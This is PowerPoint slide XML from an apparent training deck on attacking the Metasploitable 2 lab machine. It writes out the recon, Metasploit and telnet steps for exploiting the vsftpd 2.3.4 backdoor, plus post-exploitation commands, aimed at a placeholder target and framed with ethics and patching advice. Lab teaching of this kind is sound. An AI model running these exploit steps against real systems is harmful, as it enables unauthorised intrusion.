          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="27"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="831850" y="3429000"/>
            <a:ext cx="4654549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Why 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fast, visual example of an unpatched service leading to full access.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Recon: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nmap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Pn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-p 21 -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sV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&lt;TARGET_IP&gt; -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oN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ftp-recon.txt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Enumeration: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ftp &lt;TARGET_IP&gt;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</a:rPr>
              <a:t> →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anonymous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</a:rPr>
              <a:t> →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ls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Metasploit (quick):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sudo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msfconsole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-q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</a:rPr>
              <a:t> →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search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vsftpd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use exploit/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unix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/ftp/vsftpd_234_backdoor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set RHOSTS &lt;TARGET_IP&gt;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set RPORT 21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set PAYLOAD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cmd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/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unix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/interact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</a:rPr>
              <a:t> →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exploit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tabLst/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1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3A5F7C0F-7399-441C-90E6-8557019FA2CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="30"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="3403658"/>
            <a:ext cx="4024229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Manual (illustration only):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telnet &lt;TARGET_IP&gt; 21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</a:rPr>
              <a:t> — send crafted username to trigger backdoor (demo only; prefer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effectLst/>
              </a:rPr>
              <a:t>msf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</a:rPr>
              <a:t>).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Post-exploit checks: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id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whoami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uname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-a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ip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 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ls -la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effectLst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Cleanup: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exit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</a:rPr>
              <a:t> → in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effectLst/>
              </a:rPr>
              <a:t>msf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</a:rPr>
              <a:t>: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sessions -l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</a:rPr>
              <a:t> /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sessions -k &lt;id&gt;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</a:rPr>
              <a:t> → revert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pre-ftp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effectLst/>
              </a:rPr>
              <a:t> snapshot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445178DC-B720-4AE9-AF47-627A45D52F52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="31"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955889" y="2517785"/>
            <a:ext cx="9497920" cy="911215"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:no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+mn-lt"/>
                <a:ea typeface="Segoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A backdoor is like a spare key left under the doormat; once known, anyone can get in. Emphasize patching and removal of unnecessary legacy services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Segoe UI Emoj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098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2">
      <a:dk1>
        <a:srgbClr val="00BBBB"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="000000"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="999999"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="004448"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="482845"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="7A0000"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="969959"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="225B5F"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="3D8C41"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="7F7F7F"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="7F7F7F"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Custom 13">
      <a:majorFont>
        <a:latin typeface="Gill Sans MT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chemeClr val="tx2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F56488565_Futuristic pitch deck_AAS_v4" id="{81C854B4-8588-4171-B50E-9B042741D072}" vid="{97BC3161-E59E-4E12-8009-4336211748C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726A944-A9F4-4295-9B5E-C397EB1318B9}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="71af3243-3dd4-4a8d-8c0d-dd76da1f02a5"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="16c05727-aa75-4e4a-9b5f-8a80a1165891"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/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1743C61-8CA7-48FF-B2A3-6055DA854CF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72965D8-9C19-4E48-8421-5D6B21FC440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Futuristic pitch deck</Template>
  <TotalTime>0</TotalTime>
  <Words>1538</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>156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Arial</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Segoe UI Emoji</vt:lpstr>
      <vt:lpstr>Segoe UI Light</vt:lpstr>
      <vt:lpstr>Segoe UI Semibold</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>METASPLOITABLE 2</vt:lpstr>
      <vt:lpstr>wht is metasploitable 2</vt:lpstr>
      <vt:lpstr>Safety &amp; Ethics</vt:lpstr>
      <vt:lpstr>Lab Setup</vt:lpstr>
      <vt:lpstr>Finding the Target IP </vt:lpstr>
      <vt:lpstr>Demo Structure </vt:lpstr>
      <vt:lpstr>Recon Port &amp;  Service Enumeration</vt:lpstr>
      <vt:lpstr>Focused Service Exploits</vt:lpstr>
      <vt:lpstr>FTP  vsftpd 2.3.4 Backdoor Port 21</vt:lpstr>
      <vt:lpstr>SSH  Port 22</vt:lpstr>
      <vt:lpstr>Telnet  Port 23</vt:lpstr>
      <vt:lpstr>HTTP / Apache Port 80</vt:lpstr>
      <vt:lpstr>Post-Exploitation Checklist &amp; Cleanup</vt:lpstr>
      <vt:lpstr>THANK  YOUU..!!!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2025-10-03T13:58:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-03T15:50:06Z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